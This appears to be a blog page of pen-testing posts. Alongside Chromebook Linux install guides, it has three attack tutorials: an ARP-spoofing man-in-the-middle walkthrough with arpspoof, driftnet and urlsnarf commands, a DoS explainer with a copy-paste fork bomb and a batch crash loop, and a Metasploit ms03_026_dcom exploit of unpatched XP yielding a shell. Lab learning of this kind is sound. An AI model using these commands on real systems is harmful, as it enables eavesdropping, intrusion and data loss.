Showing posts with the label Pen Testing. Show all posts

How to Install Debian on chromebook with crouton

What is Debian Linux and why do I want it on my Chromebook!


Debian on Chromebook
Debian is a Linux distribution composed of open source software that is the basis of a large variety of Linux distributions. Kali, Ubuntu & Mint are a few examples of Linux distros built on top of Debian. Debian is also widely accepted as the solid Linux.

How do I install it?

To install Debian on a Chromebook you must be in developer mode. Please reference the following page to learn how to enter developer mode.
Once in developer mode you need to download crouton.
Open the crosh terminal (CTRL+ALT+T).
Enter shell mode by typing shell and pressing Enter.
From the shell, type sh ~/Downloads/crouton -r debian -t kde -n debian
-r is the release. We need to set this to debian. If the -r switch is not passed, Ubuntu will be installed.
-t is the target command that specifies what GUI you want installed by default. GNOME is the default GUI for Kali; however, it does not work on my HP Chromebook 14″. KDE works and is a good alternative to GNOME.
-n is the name parameter. We define the -n switch here so we can give the chroot a custom name of debian.
As of this article I do not recommend GNOME for the target GUI on the HP Chromebook 14.
The process will run and install Debian on the system.
At some point you will be prompted for a user name and password.

How do I start Debian on chromebook?

Once the install is complete, from the shell type sudo startdebian. (This is also known as chroot)
This will start the Debian instance.
To transition seamlessly between ChromeOS and Unity, press CTRL+ALT+<=(backward) for ChromeOS and CTRL+ALT+=>(forward).
If the machine is rebooted you will have to enter shell and type sudo startdebian again.
It is possible to install multiple chroots.

Want to know more?



~ Sunday 29 March 2015 0 comments

Turn Chromebook on Developer Mode

How do I turn on developer mode on a Chromebook?
Warning: Entering developer mode will wipe all data off of the SSD.

On an HP Chromebook 14″, with the machine booted, press ESC + REFRESH BUTTON + POWER at the same time.



The Chromebook will reboot and you will be met with a message stating “ChromeOS is missing or not found”. Press CTRL+D on the keyboard to skip this message. You will then be prompted by another message stating “To turn OS Verification off press enter”. Press ENTER. Your Chromebook will then reboot and show a screen stating “OS Verification is off”. Press CTRL+D to skip this message. You will then be prompted with the message “Your system is transitioning into developer mode. Local data has been cleared. Modifications you make to the system are not supported by Google, may cause hardware damage and may void your warranty. To cancel, turn your computer off now”. A timer in the top left-hand corner of the screen is set to 30 seconds. Wait for the timer to reach 0. Once the timer has reached 0 you will be prompted with a new message, “Preparing system for developer mode. This may take awhile. Do not turn your computer off until it restarts”. Wait for this process to complete. Once the process has completed, the Chromebook will reboot and you will again be met with the message “OS Verification is off”. Press CTRL+D to skip this screen and boot the machine.


Chromebook OS Verification

Note: If you wish to restore your chromebook back to factory and re-wipe your data, reboot your chromebook and press space bar when the following message appears “OS Verification is off. Press space to re-enable”. Pressing space bar will reset your chromebook back to factory with OS verification back on.

Once the Chromebook is in developer mode you will be able to take full advantage of the shell command. The shell command is accessed from the crosh terminal window.

To access the crosh terminal window, press CTRL+ALT+T on your keyboard.

Once it is open, type shell and press Enter. This puts you into a shell capable of some basic Linux commands. This mode is also used for loading Linux with the crouton script.


~ 0 comments

Install Ubuntu on a Chromebook

What is Ubuntu and why do I want it on my Chromebook!

Ubuntu is a Linux distribution that is widely accepted as the most commonly installed Linux distro. It is used as an alternative, although not a direct replacement, for Windows or Mac. Ubuntu extends the functionality of the Chromebook, making the Chromebook viable for developers, hackers, techies, and the common user.

Why not just install windows?
The underlying architecture of Chrome OS is strongly based on Linux and Ubuntu. Although I'm sure it is possible to install Windows on a Chromebook, you would have the dual boot/chrooted awesomeness of both ChromeOS and Ubuntu.

How do I install Ubuntu on a Chromebook?
To install Ubuntu on a Chromebook it must be in developer mode. Please reference the following page to learn how to enter developer mode.

Once in developer mode you need to download crouton.

Open the crosh terminal (CTRL+ALT+T).

Enter shell mode by typing shell and pressing Enter.

From the shell, type sh ~/Downloads/crouton -t unity

Ubuntu 12.04 is installed by default. You can switch the release of Ubuntu by using the -r command.

-t is the target command that specifies what GUI you want installed by default. Unity is recommended by me out of the box for Ubuntu for two reasons.

  • It works.
  • It is the default GUI installed when doing a fresh install of Ubuntu.

As of this article I do not recommend GNOME for the target GUI on the HP Chromebook 14.

The process will run and install Ubuntu on the system.

At some point you will be prompted for a user name and password.

How do I start Ubuntu on a Chromebook?
Once the install is complete, from the shell type sudo startunity. (This is also known as chroot)

This will start the Unity instance.

To transition seamlessly between ChromeOS and Unity, press CTRL+ALT+<=(backward) for ChromeOS and CTRL+ALT+=>(forward).

If the machine is rebooted you will have to enter shell and type sudo startunity again.

~ 0 comments

How to install Kali Linux on HP Chromebook 14

Kali Linux
What is Kali Linux and why do I want it on my Chromebook!

Kali is a Linux distribution that is widely accepted as the Linux distribution for penetration testers, security experts and hackers. It is the successor to Backtrack Linux. Kali allows the user to install packages such as aircrack-ng and reaver to collect data on and hack into wireless networks.


How Do I Install Kali Linux on a Chromebook?
To install Kali on a Chromebook with crouton, the Chromebook must be in developer mode. Please reference the following page to learn how to enter developer mode.

Once in developer mode you need to download a special forked version of crouton. Kali has not yet been pulled into the master crouton project on github.

UPDATE: Kali has been added into the main crouton tree. You can download it here crouton.

Open the crosh terminal (CTRL+ALT+T).

Enter shell mode by typing shell and pressing Enter.

From the shell, type sudo sh ~/Downloads/crouton -r kali -t kde -n kali

-r is the release. We need to set this to kali. If the -r switch is not passed, Ubuntu will be installed.

-t is the target command that specifies what GUI you want installed by default. GNOME is the default GUI for Kali; however, it does not work on my HP Chromebook 14″. KDE works and is a good alternative to GNOME.

-n is the name parameter. We define the -n switch here so we can give the chroot a custom name of kali.

As of this article I do not recommend GNOME for the target GUI on the HP Chromebook 14.

The process will run and install Kali on the system.

At some point you will be prompted for a user name and password.

How Do I Run Kali Linux on a Chromebook?
Once the install is complete, from the shell type sudo startkde.

This will start the Kali instance.

To transition seamlessly between ChromeOS and Unity, press CTRL+ALT+<=(backward) for ChromeOS and CTRL+ALT+=>(forward).

If the machine is rebooted you will have to enter shell and type sudo startkde again.

Endless Possibilities:
It is possible to install multiple chroots.

~ 0 comments

Kali Linux Man in the Middle Attack- Kali Linux Tutorial


Today our tutorial will talk about the Kali Linux Man in the Middle Attack. How do you perform a man in the middle attack using Kali Linux? We will learn the step by step process for doing this.
I believe most of you already know the concept of a man in the middle attack, but if you still don't know about this, here is a definition from Wikipedia.
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
Scenario:
This is the simple scenario, and I try to draw it in a picture.
Kali Linux Man in the Middle Attack
Victim IP address : 192.168.8.90
Attacker network interface : eth0; with IP address : 192.168.8.93
Router IP address : 192.168.8.8
Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T is the Kali shortcut) and configure the Kali Linux machine to allow packet forwarding, because to act as the man in the middle, Kali Linux must act as a router between the "real router" and the victim. Read the tutorial here on how to set up packet forwarding in Linux.
2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting the Kali Linux terminal window.
3. The next step is setting up arpspoof between the victim and the router.
arpspoof -i eth0 -t 192.168.8.90 192.168.8.8
4. Then set up arpspoof to capture all packets from the router to the victim.
arpspoof -i eth0 192.168.8.8 192.168.8.90
5. After steps three and four, all packets sent or received by the victim should be going through the attacker machine.
6. Now we can try to use driftnet to monitor all of the victim's image traffic. According to its website,
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
7. To run driftnet, we just run this
driftnet -i eth0
When the victim browses a website with images, driftnet will capture all image traffic as shown in the screenshot below.
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.
8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code
urlsnarf -i eth0
and urlsnarf will start capturing all website addresses visited by the victim machine.
9. When the victim browses a website, the attacker will know the address the victim visited.
Here is the video in case you can't get the text explanations above.
Conclusion:
1. To change or spoof the attacker MAC address, you can view the tutorial about how to change the Kali Linux MAC address.
2. Driftnet and Urlsnarf are hard to detect, but you can try to find devices on your network that are in promiscuous mode, which have the possibility to sniff the network traffic.
Hope you found it useful :-)
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.p8piGoyv.dpuf

~ Saturday 30 August 2014 0 comments

Denial of Service Attack : EXPLAINED FOR BEGINNERS AND DUMMIES

Just like most other things associated with hacking, a denial of service attack is not everyone's cup of tea. It, however, can be understood if explained properly. In this tutorial, I'll try to give you a big picture of denial of service attacks, before I start using geeky terms like packets and all that. We'll start at the easiest point.

What effect does a denial of service attack have

Wireless hacking usually gives you the password of a wireless network. A man in the middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource of the right to use it. I mean if I successfully perform a DOS on your machine, you won't be able to use it anymore. In the modern scenario, it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance - a name worth mentioning here is Anonymous) do a Distributed Denial of Service attack on government and private websites to make them listen to the people's opinion (the legitimacy of this method of dictating your opinion has been a topic of debate, and a lot of hacktivists had to suffer jail time for participating in DDOS). So basically it's just what its name suggests, Denial Of Service.

Basic Concept

It uses the fact that while a service can be more than sufficient to cater to the demands of the desired users, a drastic increase in unwelcome users can make the service go down. Most of us use the words like "This website was down the other day" without any idea what it actually means. Well now you do. To give you a good idea of what is happening, I'll take the example from the movie "We Are Legion".

Scenario One : Multiplayer online game

Now consider you are playing an online multi-player game. There are millions of other people who also play this game. Now there's a pool in the game that everyone likes to visit. Now you and your friends know that they have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. And then all of you go and block the access to the pool. You just carried out a denial of service attack. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago. This is the kind of thing that gives you a very basic idea what a denial of service attack can be.
Denial of service in a game
They made a Swastika and blocked access to the pool

Scenario 2 : Bus stop

Now assume that due to some reason, you want to disrupt the bus service of your city and stop the people from using the service. To stop the legitimate people from utilizing this service, you can call your friends to unnecessarily use it. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. Practically it is not feasible since you don't have millions of friends, and they are definitely not wasting their time and money riding aimlessly from one place to another.

So while this may seem impossible in the real world, in the virtual world, you alone can cause as much load as a thousand (or even a million) users at the click of a button. There are many tools out there for this purpose; however, you are not recommended to use them, as a DOS on someone else is illegal and easy to detect (Knock, knock. It's the police). We will come back to this later, and do a DOS on our own computer.

How denial of service attacks are carried out

Basically, when you visit a website, you send them a request to deliver their content to you. What you send is a packet. Actually, it takes more than just one packet; you need a lot of them. But still, the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources, which they pay for. A legitimate view can easily earn more than the server costs on account of advertisements, etc. So, companies buy servers that can provide enough data transfer for their regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And since the company knows it is under DOS, it just turns off the server, so that it does not have to waste its monetary resources on a DOS, and waits till the DOS stops. Now with modern computers and bandwidth, we alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time, the servers do too). However, if a lot of people like you do a DOS attack, it becomes a distributed denial of service attack. This can easily be fatal for a server. It's just like you go to a page, and start refreshing it very fast, maybe a thousand times every second. And you are not the only one. There are a thousand others that are doing the same thing. So basically you guys are equivalent to more than a million users using the site simultaneously, and that's not something the server can take. Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. But it's not just the websites that get better; the black hat hackers too are improving every day. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides (the good, the bad and the ugly).
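
The paragraph above mentions servers that identify a DOS and block the traffic from that IP. The Python sketch below is an added example, not from the original post: it counts requests per source in one-second windows and shows why a per-IP threshold catches a single noisy client but misses a distributed flood, which only shows up in the aggregate rate. The thresholds, addresses and request records are all constructed for illustration.

```python
from collections import Counter, defaultdict

PER_IP_LIMIT = 20   # assumed: max requests one source may send per second
TOTAL_LIMIT = 200   # assumed: requests per second the site is sized for


def bucket(requests):
    """Group (timestamp_seconds, source_ip) records into 1-second windows."""
    windows = defaultdict(Counter)
    for ts, ip in requests:
        windows[int(ts)][ip] += 1
    return windows


def analyse(requests, per_ip_limit=PER_IP_LIMIT, total_limit=TOTAL_LIMIT):
    """Return (noisy_sources, overloaded_windows).

    noisy_sources:      IPs that exceeded the per-source limit in any window,
                        i.e. what simple per-IP blocking would act on.
    overloaded_windows: (second, total_requests, distinct_sources) for windows
                        whose aggregate rate exceeded the site's capacity.
    """
    noisy, overloaded = set(), []
    for second, counts in sorted(bucket(requests).items()):
        noisy.update(ip for ip, n in counts.items() if n > per_ip_limit)
        total = sum(counts.values())
        if total > total_limit:
            overloaded.append((second, total, len(counts)))
    return noisy, overloaded


# --- constructed traffic, all inside the same one-second window ---
def normal_traffic():
    # 10 ordinary visitors, 2 requests each
    return [(0.5, f"198.51.100.{i}") for i in range(1, 11) for _ in range(2)]


def single_source_flood():
    # one client refreshing a thousand times in a second
    return normal_traffic() + [(j / 1000, "203.0.113.7") for j in range(1000)]


def distributed_flood():
    # a thousand clients, each sending only 5 requests (under the per-IP limit)
    bots = [f"10.0.{i // 250}.{i % 250 + 1}" for i in range(1000)]
    return normal_traffic() + [(0.2 * k, ip) for ip in bots for k in range(5)]


if __name__ == "__main__":
    for name, gen in (("normal", normal_traffic),
                      ("single source", single_source_flood),
                      ("distributed", distributed_flood)):
        noisy, overloaded = analyse(gen())
        print(f"{name}: block candidates={sorted(noisy)} overloaded={overloaded}")
```

In the distributed case no single address crosses the per-IP limit, so mitigation has to key on the aggregate rate and the number of distinct sources rather than on one address.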

A Live DOS on your Kali Machine

If you have Kali Linux (the hacker's OS, the OS of choice if you use this blog) then here's a small exercise for you.
We are going to execute a command in the Kali Linux terminal that will cripple the operating system and make it hang. It will most probably work on other Linux distributions too.
Warning: This code will freeze Kali Linux, and most probably it will not recover from the shock. You'll lose any unsaved data. You will have to restart the machine the hard way (turn off the virtual machine directly or cut the power supply if it's a real machine). Just copy paste the code and your computer is gone.
:(){ :|:& };:

The machine froze right after I pressed enter. I had to power it off from the Vmware interface.
What basically happened is that the one-line command asked the operating system to keep opening processes very fast for an infinite period of time. It just gave up.
Here's something for the Windows users.

Crashing Windows Using Batch file

Open a notepad. Put the following code in it-
:1
Start
goto 1
Save the file as name.bat
Bat here is batch file extension. Run it. Game over.
It basically executes the second line, and the third line makes it go over to the first, execute the second, and then over to first again, execute the second..... infinitely. So again, denial of service. All the processing power is used by a useless command, while you, the legitimate user, can't do anything.

That's it for this tutorial, we'll discuss the technical details of a practical denial of service in a later tutorial.

~ Thursday 7 August 2014 0 comments

PENETRATION TESTING - HACKING XP With KALI Linux Tutorial

Our approach to penetration testing is going to be simple. I already made a post about the ideal way to begin penetration testing. But we aren't going the ideal way. I'm gonna teach you penetration testing the way I learnt it: by doing actual penetration and exploitation. We can't hack a completely patched Windows 7 or Windows 8 right in the first tutorial, but we can definitely hack an unpatched Windows XP machine. However, to do that, you need a victim machine. Testing this method on someone else's computer is not recommended and is highly illegal. It is strongly advised to create your own virtual machine and test exploits there.

What are you going to need

Knowledge

  • Basic Penetration testing terms (I recommend that you take a look here, as I'm going to use the terms freely without any explanation here in this tutorial)
  • The tough manual way of penetration testing (A large patch of advanced material which will help you become a great pentester if you have the patience to read it all and capability to understand it)
  • VMWare tools (Without Vmware tools there is no way you can have a Kali linux (attacker machine) and unpatched XP (target machine) running at the same time in one single computer)

Virtual Machines

  • Kali linux ( Click the link for a complete detailed guide)
  • Windows XP (After you've followed the tutorial above for installing Kali linux, installing XP on a VM will be a piece of cake, a few screenshots of the process)



Now there is a catch with Windows XP. While Kali Linux is free, Windows XP is not. So you have to buy one. I'm dead against piracy, and won't promote anything of that kind on my blog. Just make sure that when you are buying a Windows XP CD, it is unpatched and SP1. If it is patched then the exploits won't work. Your best bet would be to look through your shelves to find an old XP CD that you bought years ago which is catching dust, and put it to some use.

A look at Metasploit Framework

Starting the framework

"In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." Simply speaking, there are some services that metasploit needs which aren't started with system startup. So here's some commands you need to execute on your console before you can start metasploit
service postgresql start
(Metasploit uses PostgreSQL as its database so it needs to be launched first.)

With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.

service metasploit start
Now finally we are ready to start metasploit framework.
msfconsole

Looking at the targets

Right now, my Metasploit framework is running on Kali on VMware on a Windows 8 machine. Also, there is a Windows XP Sp3 virtual machine running side by side with my Kali. So what we need to do is detect these machines in the Metasploit framework. For this we'll do a port scan.

Port Scan

Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. To use this feature, enter the following code-
use auxiliary/scanner/portscan/tcp
Type show options to see the available options
show options
Now we have to change a few settings. Firstly, we should reduce the number of ports scanned
set ports 1-500
Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type
ipconfig
In the results, check the IP of the machine. This is what you'll have to specify the RHOSTS option as.
In my case the IP is 192.168.63.131
Now go back to your Kali machine, and type the following (change the IP as required)
set RHOST 192.168.63.131
Here's what it should look like


There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end.
Now we are ready for some action, do a show options again to see what all changes you've made. Finally, type-
run
The scan will start and after some time it will show you which TCP ports are open and vulnerable to attack.
If you are not using an unpatched version of Windows, there will not be any vulnerable ports.

This basically means that there are no open ports here. Nothing much you can do. However, if you had some good luck there, and had a vulnerable machine, you will have some vulnerable ports. In my case, I turned off the firewall on the Windows machine and ran the auxiliary module again.
I got 3 open ports this time. If you are using some higher XP version, you too might need to disable the firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445 open.

Real life port scan

In an actual pentesting environment, you don't know the IP, open ports and OS of the target computer. In such cases, we can use the Nmap port scanner, which is much better than auxiliary. We'll come to that later.

Finding Exploits

This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of auxiliary scanner. Search for dcom on msfconsole.
search dcom
This is a very famous exploit for Windows.
Copy the exploit number 3. (Which shows great as rank). In the next line, type
use exploit/windows/dcerpc/ms03_026_dcom
You are now using the most famous Windows exploit. Type show options again
show options
Again, set the RHOST as 192.168.63.131 (replace with the IP of your target)
set RHOST 192.168.63.131 
Also, set a payload.
set PAYLOAD windows/shell_bind_tcp

And here's the best part

exploit

You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial.
Update - The next tutorial is here. It discusses the post exploitation fun that you can have with the meterpreter payload.
We have a pentesting lab now and have successfully exploited an XP machine.

~ 0 comments

Hack Router Password Hack Using Medusa Kali linux Tutorial